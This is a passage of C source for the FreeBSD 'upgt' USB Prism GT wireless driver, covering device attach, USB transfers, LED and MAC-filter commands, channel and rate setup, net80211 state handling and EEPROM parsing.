ieee80211vap *, struct ieee80211com *); static int upgt_set_macfilter(struct upgt_softc *, uint8_t); static int upgt_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void upgt_set_chan(struct upgt_softc *, struct ieee80211_channel *); static void upgt_set_led(struct upgt_softc *, int); static void upgt_set_led_blink(void *); static void upgt_get_stats(struct upgt_softc *); static void upgt_mem_free(struct upgt_softc *, uint32_t); static uint32_t upgt_mem_alloc(struct upgt_softc *); static void upgt_free_tx(struct upgt_softc *); static void upgt_free_rx(struct upgt_softc *); static void upgt_watchdog(void *); static void upgt_abort_xfers(struct upgt_softc *); static void upgt_abort_xfers_locked(struct upgt_softc *); static void upgt_sysctl_node(struct upgt_softc *); static struct upgt_data * upgt_getbuf(struct upgt_softc *); static struct upgt_data * upgt_gettxbuf(struct upgt_softc *); static int upgt_tx_start(struct upgt_softc *, struct mbuf *, struct ieee80211_node *, struct upgt_data *); static const char *upgt_fwname = "upgt-gw3887"; static const STRUCT_USB_HOST_ID upgt_devs[] = { #define UPGT_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } /* version 2 devices */ UPGT_DEV(ACCTON, PRISM_GT), UPGT_DEV(BELKIN, F5D7050), UPGT_DEV(CISCOLINKSYS, WUSB54AG), UPGT_DEV(CONCEPTRONIC, PRISM_GT), UPGT_DEV(DELL, PRISM_GT_1), UPGT_DEV(DELL, PRISM_GT_2), UPGT_DEV(FSC, E5400), UPGT_DEV(GLOBESPAN, PRISM_GT_1), UPGT_DEV(GLOBESPAN, PRISM_GT_2), UPGT_DEV(NETGEAR, WG111V2_2), UPGT_DEV(INTERSIL, PRISM_GT), UPGT_DEV(SMC, 2862WG), UPGT_DEV(USR, USR5422), UPGT_DEV(WISTRONNEWEB, UR045G), UPGT_DEV(XYRATEX, PRISM_GT_1), UPGT_DEV(XYRATEX, PRISM_GT_2), UPGT_DEV(ZCOM, XG703A), UPGT_DEV(ZCOM, XM142) }; static usb_callback_t upgt_bulk_rx_callback; static usb_callback_t upgt_bulk_tx_callback; static const struct usb_config upgt_config[UPGT_N_XFERS] = { [UPGT_BULK_TX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = MCLBYTES * UPGT_TX_MAXCOUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1 }, .callback = upgt_bulk_tx_callback, .timeout = UPGT_USB_TIMEOUT, /* ms */ }, [UPGT_BULK_RX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = MCLBYTES * UPGT_RX_MAXCOUNT, .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = upgt_bulk_rx_callback, }, }; static int upgt_match(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != UPGT_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != UPGT_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(upgt_devs, sizeof(upgt_devs), uaa)); } static int upgt_attach(device_t dev) { int error; struct ieee80211com *ic; struct ifnet *ifp; struct upgt_softc *sc = device_get_softc(dev); struct usb_attach_arg *uaa = device_get_ivars(dev); uint8_t bands, iface_index = UPGT_IFACE_INDEX; sc->sc_dev = dev; sc->sc_udev = uaa->device; #ifdef UPGT_DEBUG sc->sc_debug = upgt_debug; #endif device_set_usb_desc(dev); mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); callout_init(&sc->sc_led_ch, 0); callout_init(&sc->sc_watchdog_ch, 0); error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, upgt_config, UPGT_N_XFERS, sc, &sc->sc_mtx); if (error) { device_printf(dev, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto fail1; } sc->sc_rx_dma_buf = usbd_xfer_get_frame_buffer( sc->sc_xfer[UPGT_BULK_RX], 0); sc->sc_tx_dma_buf = 
usbd_xfer_get_frame_buffer( sc->sc_xfer[UPGT_BULK_TX], 0); /* Setup TX and RX buffers */ error = upgt_alloc_tx(sc); if (error) goto fail2; error = upgt_alloc_rx(sc); if (error) goto fail3; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc()\n"); goto fail4; } /* Initialize the device. */ error = upgt_device_reset(sc); if (error) goto fail5; /* Verify the firmware. */ error = upgt_fw_verify(sc); if (error) goto fail5; /* Calculate device memory space. */ if (sc->sc_memaddr_frame_start == 0 || sc->sc_memaddr_frame_end == 0) { device_printf(dev, "could not find memory space addresses on FW\n"); error = EIO; goto fail5; } sc->sc_memaddr_frame_end -= UPGT_MEMSIZE_RX + 1; sc->sc_memaddr_rx_start = sc->sc_memaddr_frame_end + 1; DPRINTF(sc, UPGT_DEBUG_FW, "memory address frame start=0x%08x\n", sc->sc_memaddr_frame_start); DPRINTF(sc, UPGT_DEBUG_FW, "memory address frame end=0x%08x\n", sc->sc_memaddr_frame_end); DPRINTF(sc, UPGT_DEBUG_FW, "memory address rx start=0x%08x\n", sc->sc_memaddr_rx_start); upgt_mem_init(sc); /* Load the firmware. */ error = upgt_fw_load(sc); if (error) goto fail5; /* Read the whole EEPROM content and parse it. */ error = upgt_eeprom_read(sc); if (error) goto fail5; error = upgt_eeprom_parse(sc); if (error) goto fail5; /* all works related with the device have done here. */ upgt_abort_xfers(sc); /* Setup the 802.11 device. */ ifp->if_softc = sc; if_initname(ifp, "upgt", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = upgt_init; ifp->if_ioctl = upgt_ioctl; ifp->if_start = upgt_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); IFQ_SET_READY(&ifp->if_snd); ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_myaddr); ic->ic_raw_xmit = upgt_raw_xmit; ic->ic_scan_start = upgt_scan_start; ic->ic_scan_end = upgt_scan_end; ic->ic_set_channel = upgt_set_channel; ic->ic_vap_create = upgt_vap_create; ic->ic_vap_delete = upgt_vap_delete; ic->ic_update_mcast = upgt_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), UPGT_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), UPGT_RX_RADIOTAP_PRESENT); upgt_sysctl_node(sc); if (bootverbose) ieee80211_announce(ic); return (0); fail5: if_free(ifp); fail4: upgt_free_rx(sc); fail3: upgt_free_tx(sc); fail2: usbd_transfer_unsetup(sc->sc_xfer, UPGT_N_XFERS); fail1: mtx_destroy(&sc->sc_mtx); return (error); } static void upgt_txeof(struct usb_xfer *xfer, struct upgt_data *data) { struct upgt_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; UPGT_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB) { /* XXX status? 
*/ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { ieee80211_free_node(data->ni); data->ni = NULL; } ifp->if_opackets++; } static void upgt_get_stats(struct upgt_softc *sc) { struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_stats *stats; data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { device_printf(sc->sc_dev, "%s: out of buffer.\n", __func__); return; } /* * Transmit the URB containing the CMD data. */ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); stats = (struct upgt_lmac_stats *)(mem + 1); stats->header1.flags = 0; stats->header1.type = UPGT_H1_TYPE_CTRL; stats->header1.len = htole16( sizeof(struct upgt_lmac_stats) - sizeof(struct upgt_lmac_header)); stats->header2.reqid = htole32(sc->sc_memaddr_frame_start); stats->header2.type = htole16(UPGT_H2_TYPE_STATS); stats->header2.flags = 0; data_cmd->buflen = sizeof(*mem) + sizeof(*stats); mem->chksum = upgt_chksum_le((uint32_t *)stats, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); } static int upgt_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct upgt_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; UPGT_LOCK(sc); error = (sc->sc_flags & UPGT_FLAG_DETACHED) ? ENXIO : 0; UPGT_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if (ifp->if_drv_flags & IFF_DRV_RUNNING) { if ((ifp->if_flags ^ sc->sc_if_flags) & (IFF_ALLMULTI | IFF_PROMISC)) upgt_set_multi(sc); } else { upgt_init(sc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) upgt_stop(sc); } sc->sc_if_flags = ifp->if_flags; if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void upgt_stop_locked(struct upgt_softc *sc) { struct ifnet *ifp = sc->sc_ifp; UPGT_ASSERT_LOCKED(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) upgt_set_macfilter(sc, IEEE80211_S_INIT); upgt_abort_xfers_locked(sc); } static void upgt_stop(struct upgt_softc *sc) { struct ifnet *ifp = sc->sc_ifp; UPGT_LOCK(sc); upgt_stop_locked(sc); UPGT_UNLOCK(sc); /* device down */ sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); sc->sc_flags &= ~UPGT_FLAG_INITDONE; } static void upgt_set_led(struct upgt_softc *sc, int action) { struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_led *led; data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { device_printf(sc->sc_dev, "%s: out of buffers.\n", __func__); return; } /* * Transmit the URB containing the CMD data. 
*/ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); led = (struct upgt_lmac_led *)(mem + 1); led->header1.flags = UPGT_H1_FLAGS_TX_NO_CALLBACK; led->header1.type = UPGT_H1_TYPE_CTRL; led->header1.len = htole16( sizeof(struct upgt_lmac_led) - sizeof(struct upgt_lmac_header)); led->header2.reqid = htole32(sc->sc_memaddr_frame_start); led->header2.type = htole16(UPGT_H2_TYPE_LED); led->header2.flags = 0; switch (action) { case UPGT_LED_OFF: led->mode = htole16(UPGT_LED_MODE_SET); led->action_fix = 0; led->action_tmp = htole16(UPGT_LED_ACTION_OFF); led->action_tmp_dur = 0; break; case UPGT_LED_ON: led->mode = htole16(UPGT_LED_MODE_SET); led->action_fix = 0; led->action_tmp = htole16(UPGT_LED_ACTION_ON); led->action_tmp_dur = 0; break; case UPGT_LED_BLINK: if (sc->sc_state != IEEE80211_S_RUN) { STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data_cmd, next); return; } if (sc->sc_led_blink) { /* previous blink was not finished */ STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data_cmd, next); return; } led->mode = htole16(UPGT_LED_MODE_SET); led->action_fix = htole16(UPGT_LED_ACTION_OFF); led->action_tmp = htole16(UPGT_LED_ACTION_ON); led->action_tmp_dur = htole16(UPGT_LED_ACTION_TMP_DUR); /* lock blink */ sc->sc_led_blink = 1; callout_reset(&sc->sc_led_ch, hz, upgt_set_led_blink, sc); break; default: STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data_cmd, next); return; } data_cmd->buflen = sizeof(*mem) + sizeof(*led); mem->chksum = upgt_chksum_le((uint32_t *)led, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); } static void upgt_set_led_blink(void *arg) { struct upgt_softc *sc = arg; /* blink finished, we are ready for a next one */ sc->sc_led_blink = 0; } static void upgt_init(void *priv) { struct upgt_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; UPGT_LOCK(sc); upgt_init_locked(sc); UPGT_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void upgt_init_locked(struct upgt_softc *sc) { struct ifnet *ifp = sc->sc_ifp; UPGT_ASSERT_LOCKED(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) upgt_stop_locked(sc); usbd_transfer_start(sc->sc_xfer[UPGT_BULK_RX]); (void)upgt_set_macfilter(sc, IEEE80211_S_SCAN); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->sc_flags |= UPGT_FLAG_INITDONE; callout_reset(&sc->sc_watchdog_ch, hz, upgt_watchdog, sc); } static int upgt_set_macfilter(struct upgt_softc *sc, uint8_t state) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_filter *filter; uint8_t broadcast[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; UPGT_ASSERT_LOCKED(sc); data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { device_printf(sc->sc_dev, "out of TX buffers.\n"); return (ENOBUFS); } /* * Transmit the URB containing the CMD data. 
*/ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); filter = (struct upgt_lmac_filter *)(mem + 1); filter->header1.flags = UPGT_H1_FLAGS_TX_NO_CALLBACK; filter->header1.type = UPGT_H1_TYPE_CTRL; filter->header1.len = htole16( sizeof(struct upgt_lmac_filter) - sizeof(struct upgt_lmac_header)); filter->header2.reqid = htole32(sc->sc_memaddr_frame_start); filter->header2.type = htole16(UPGT_H2_TYPE_MACFILTER); filter->header2.flags = 0; switch (state) { case IEEE80211_S_INIT: DPRINTF(sc, UPGT_DEBUG_STATE, "%s: set MAC filter to INIT\n", __func__); filter->type = htole16(UPGT_FILTER_TYPE_RESET); break; case IEEE80211_S_SCAN: DPRINTF(sc, UPGT_DEBUG_STATE, "set MAC filter to SCAN (bssid %s)\n", ether_sprintf(broadcast)); filter->type = htole16(UPGT_FILTER_TYPE_NONE); IEEE80211_ADDR_COPY(filter->dst, sc->sc_myaddr); IEEE80211_ADDR_COPY(filter->src, broadcast); filter->unknown1 = htole16(UPGT_FILTER_UNKNOWN1); filter->rxaddr = htole32(sc->sc_memaddr_rx_start); filter->unknown2 = htole16(UPGT_FILTER_UNKNOWN2); filter->rxhw = htole32(sc->sc_eeprom_hwrx); filter->unknown3 = htole16(UPGT_FILTER_UNKNOWN3); break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); /* XXX monitor mode isn't tested yet. */ if (vap->iv_opmode == IEEE80211_M_MONITOR) { filter->type = htole16(UPGT_FILTER_TYPE_MONITOR); IEEE80211_ADDR_COPY(filter->dst, sc->sc_myaddr); IEEE80211_ADDR_COPY(filter->src, ni->ni_bssid); filter->unknown1 = htole16(UPGT_FILTER_MONITOR_UNKNOWN1); filter->rxaddr = htole32(sc->sc_memaddr_rx_start); filter->unknown2 = htole16(UPGT_FILTER_MONITOR_UNKNOWN2); filter->rxhw = htole32(sc->sc_eeprom_hwrx); filter->unknown3 = htole16(UPGT_FILTER_MONITOR_UNKNOWN3); } else { DPRINTF(sc, UPGT_DEBUG_STATE, "set MAC filter to RUN (bssid %s)\n", ether_sprintf(ni->ni_bssid)); filter->type = htole16(UPGT_FILTER_TYPE_STA); IEEE80211_ADDR_COPY(filter->dst, sc->sc_myaddr); IEEE80211_ADDR_COPY(filter->src, ni->ni_bssid); filter->unknown1 = htole16(UPGT_FILTER_UNKNOWN1); filter->rxaddr = htole32(sc->sc_memaddr_rx_start); filter->unknown2 = htole16(UPGT_FILTER_UNKNOWN2); filter->rxhw = htole32(sc->sc_eeprom_hwrx); filter->unknown3 = htole16(UPGT_FILTER_UNKNOWN3); } ieee80211_free_node(ni); break; default: device_printf(sc->sc_dev, "MAC filter does not know that state\n"); break; } data_cmd->buflen = sizeof(*mem) + sizeof(*filter); mem->chksum = upgt_chksum_le((uint32_t *)filter, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); return (0); } static void upgt_setup_rates(struct ieee80211vap *vap, struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct upgt_softc *sc = ifp->if_softc; const struct ieee80211_txparam *tp; /* * 0x01 = OFMD6 0x10 = DS1 * 0x04 = OFDM9 0x11 = DS2 * 0x06 = OFDM12 0x12 = DS5 * 0x07 = OFDM18 0x13 = DS11 * 0x08 = OFDM24 * 0x09 = OFDM36 * 0x0a = OFDM48 * 0x0b = OFDM54 */ const uint8_t rateset_auto_11b[] = { 0x13, 0x13, 0x12, 0x11, 0x11, 0x10, 0x10, 0x10 }; const uint8_t rateset_auto_11g[] = { 0x0b, 0x0a, 0x09, 0x08, 0x07, 0x06, 0x04, 0x01 }; const uint8_t rateset_fix_11bg[] = { 0x10, 0x11, 0x12, 0x13, 0x01, 0x04, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b }; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; /* XXX */ if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) { /* * Automatic rate control is done by the device. * We just pass the rateset from which the device * will pickup a rate. 
*/ if (ic->ic_curmode == IEEE80211_MODE_11B) memcpy(sc->sc_cur_rateset, rateset_auto_11b, sizeof(sc->sc_cur_rateset)); if (ic->ic_curmode == IEEE80211_MODE_11G || ic->ic_curmode == IEEE80211_MODE_AUTO) memcpy(sc->sc_cur_rateset, rateset_auto_11g, sizeof(sc->sc_cur_rateset)); } else { /* set a fixed rate */ memset(sc->sc_cur_rateset, rateset_fix_11bg[tp->ucastrate], sizeof(sc->sc_cur_rateset)); } } static void upgt_set_multi(void *arg) { struct upgt_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (!(ifp->if_flags & IFF_UP)) return; /* * XXX don't know how to set a device. Lack of docs. Just try to set * IFF_ALLMULTI flag here. */ ifp->if_flags |= IFF_ALLMULTI; } static void upgt_start(struct ifnet *ifp) { struct upgt_softc *sc = ifp->if_softc; struct upgt_data *data_tx; struct ieee80211_node *ni; struct mbuf *m; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; UPGT_LOCK(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; data_tx = upgt_gettxbuf(sc); if (data_tx == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; if (upgt_tx_start(sc, m, ni, data_tx) != 0) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, data_tx, next); UPGT_STAT_INC(sc, st_tx_inactive); ieee80211_free_node(ni); ifp->if_oerrors++; continue; } sc->sc_tx_timer = 5; } UPGT_UNLOCK(sc); } static int upgt_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct upgt_softc *sc = ifp->if_softc; struct upgt_data *data_tx = NULL; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } UPGT_LOCK(sc); data_tx = upgt_gettxbuf(sc); if (data_tx == NULL) { ieee80211_free_node(ni); m_freem(m); UPGT_UNLOCK(sc); return (ENOBUFS); } if (upgt_tx_start(sc, m, ni, data_tx) != 0) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, data_tx, next); UPGT_STAT_INC(sc, st_tx_inactive); ieee80211_free_node(ni); ifp->if_oerrors++; UPGT_UNLOCK(sc); return (EIO); } UPGT_UNLOCK(sc); sc->sc_tx_timer = 5; return (0); } static void upgt_watchdog(void *arg) { struct upgt_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { device_printf(sc->sc_dev, "watchdog timeout\n"); /* upgt_init(ifp); XXX needs a process context ? */ ifp->if_oerrors++; return; } callout_reset(&sc->sc_watchdog_ch, hz, upgt_watchdog, sc); } } static uint32_t upgt_mem_alloc(struct upgt_softc *sc) { int i; for (i = 0; i < sc->sc_memory.pages; i++) { if (sc->sc_memory.page[i].used == 0) { sc->sc_memory.page[i].used = 1; return (sc->sc_memory.page[i].addr); } } return (0); } static void upgt_scan_start(struct ieee80211com *ic) { /* do nothing. */ } static void upgt_scan_end(struct ieee80211com *ic) { /* do nothing. 
*/ } static void upgt_set_channel(struct ieee80211com *ic) { struct upgt_softc *sc = ic->ic_ifp->if_softc; UPGT_LOCK(sc); upgt_set_chan(sc, ic->ic_curchan); UPGT_UNLOCK(sc); } static void upgt_set_chan(struct upgt_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_channel *chan; int channel; UPGT_ASSERT_LOCKED(sc); channel = ieee80211_chan2ieee(ic, c); if (channel == 0 || channel == IEEE80211_CHAN_ANY) { /* XXX should NEVER happen */ device_printf(sc->sc_dev, "%s: invalid channel %x\n", __func__, channel); return; } DPRINTF(sc, UPGT_DEBUG_STATE, "%s: channel %d\n", __func__, channel); data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { device_printf(sc->sc_dev, "%s: out of buffers.\n", __func__); return; } /* * Transmit the URB containing the CMD data. */ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); chan = (struct upgt_lmac_channel *)(mem + 1); chan->header1.flags = UPGT_H1_FLAGS_TX_NO_CALLBACK; chan->header1.type = UPGT_H1_TYPE_CTRL; chan->header1.len = htole16( sizeof(struct upgt_lmac_channel) - sizeof(struct upgt_lmac_header)); chan->header2.reqid = htole32(sc->sc_memaddr_frame_start); chan->header2.type = htole16(UPGT_H2_TYPE_CHANNEL); chan->header2.flags = 0; chan->unknown1 = htole16(UPGT_CHANNEL_UNKNOWN1); chan->unknown2 = htole16(UPGT_CHANNEL_UNKNOWN2); chan->freq6 = sc->sc_eeprom_freq6[channel]; chan->settings = sc->sc_eeprom_freq6_settings; chan->unknown3 = UPGT_CHANNEL_UNKNOWN3; memcpy(chan->freq3_1, &sc->sc_eeprom_freq3[channel].data, sizeof(chan->freq3_1)); memcpy(chan->freq4, &sc->sc_eeprom_freq4[channel], sizeof(sc->sc_eeprom_freq4[channel])); memcpy(chan->freq3_2, &sc->sc_eeprom_freq3[channel].data, sizeof(chan->freq3_2)); data_cmd->buflen = sizeof(*mem) + sizeof(*chan); mem->chksum = upgt_chksum_le((uint32_t *)chan, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); } static struct ieee80211vap * upgt_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct upgt_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; uvp = (struct upgt_vap *) malloc(sizeof(struct upgt_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return NULL; vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = upgt_newstate; /* setup device rates */ upgt_setup_rates(vap, ic); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static int upgt_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct upgt_vap *uvp = UPGT_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct upgt_softc *sc = ic->ic_ifp->if_softc; /* do it in a process context */ sc->sc_state = nstate; IEEE80211_UNLOCK(ic); UPGT_LOCK(sc); callout_stop(&sc->sc_led_ch); callout_stop(&sc->sc_watchdog_ch); switch (nstate) { case IEEE80211_S_INIT: /* do not accept any frames if the device is down */ 
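/*
 * Editor's note: illustrative sketch only, not part of this change.  The
 * upgt_vap_create()/upgt_newstate() code around this point follows the
 * common net80211 idiom of saving the stack's iv_newstate handler in the
 * driver vap and chaining to it once the hardware has been reprogrammed.
 * The fragment below shows that idiom in isolation; all mydrv_* names are
 * hypothetical and the block is kept out of the build with #if 0.
 */
#if 0
struct mydrv_vap {
	struct ieee80211vap	vap;		/* must be first */
	int			(*newstate)(struct ieee80211vap *,
				    enum ieee80211_state, int);
};
#define	MYDRV_VAP(vap)	((struct mydrv_vap *)(vap))

static int
mydrv_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg)
{
	struct mydrv_vap *mvp = MYDRV_VAP(vap);
	struct ieee80211com *ic = vap->iv_ic;

	IEEE80211_UNLOCK(ic);	/* drop the com lock for driver I/O */
	/* ... program channel, MAC filter, LEDs, etc. for nstate ... */
	IEEE80211_LOCK(ic);
	/* Chain to the handler net80211 installed originally. */
	return (mvp->newstate(vap, nstate, arg));
}

static void
mydrv_override_newstate(struct ieee80211vap *vap)
{
	struct mydrv_vap *mvp = MYDRV_VAP(vap);

	mvp->newstate = vap->iv_newstate;	/* save the stack handler */
	vap->iv_newstate = mydrv_newstate;	/* install the wrapper */
}
#endif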
(void)upgt_set_macfilter(sc, sc->sc_state); upgt_set_led(sc, UPGT_LED_OFF); break; case IEEE80211_S_SCAN: upgt_set_chan(sc, ic->ic_curchan); break; case IEEE80211_S_AUTH: upgt_set_chan(sc, ic->ic_curchan); break; case IEEE80211_S_ASSOC: break; case IEEE80211_S_RUN: upgt_set_macfilter(sc, sc->sc_state); upgt_set_led(sc, UPGT_LED_ON); break; default: break; } UPGT_UNLOCK(sc); IEEE80211_LOCK(ic); return (uvp->newstate(vap, nstate, arg)); } static void upgt_vap_delete(struct ieee80211vap *vap) { struct upgt_vap *uvp = UPGT_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static void upgt_update_mcast(struct ifnet *ifp) { struct upgt_softc *sc = ifp->if_softc; upgt_set_multi(sc); } static int upgt_eeprom_parse(struct upgt_softc *sc) { struct upgt_eeprom_header *eeprom_header; struct upgt_eeprom_option *eeprom_option; uint16_t option_len; uint16_t option_type; uint16_t preamble_len; int option_end = 0; /* calculate eeprom options start offset */ eeprom_header = (struct upgt_eeprom_header *)sc->sc_eeprom; preamble_len = le16toh(eeprom_header->preamble_len); eeprom_option = (struct upgt_eeprom_option *)(sc->sc_eeprom + (sizeof(struct upgt_eeprom_header) + preamble_len)); while (!option_end) { /* sanity check */ if (eeprom_option >= (struct upgt_eeprom_option *) (sc->sc_eeprom + UPGT_EEPROM_SIZE)) { return (EINVAL); } /* the eeprom option length is stored in words */ option_len = (le16toh(eeprom_option->len) - 1) * sizeof(uint16_t); option_type = le16toh(eeprom_option->type); /* sanity check */ if (option_len == 0 || option_len >= UPGT_EEPROM_SIZE) return (EINVAL); switch (option_type) { case UPGT_EEPROM_TYPE_NAME: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM name len=%d\n", option_len); break; case UPGT_EEPROM_TYPE_SERIAL: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM serial len=%d\n", option_len); break; case UPGT_EEPROM_TYPE_MAC: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM mac len=%d\n", option_len); IEEE80211_ADDR_COPY(sc->sc_myaddr, eeprom_option->data); break; case UPGT_EEPROM_TYPE_HWRX: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM hwrx len=%d\n", option_len); upgt_eeprom_parse_hwrx(sc, eeprom_option->data); break; case UPGT_EEPROM_TYPE_CHIP: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM chip len=%d\n", option_len); break; case UPGT_EEPROM_TYPE_FREQ3: DPRINTF(sc, 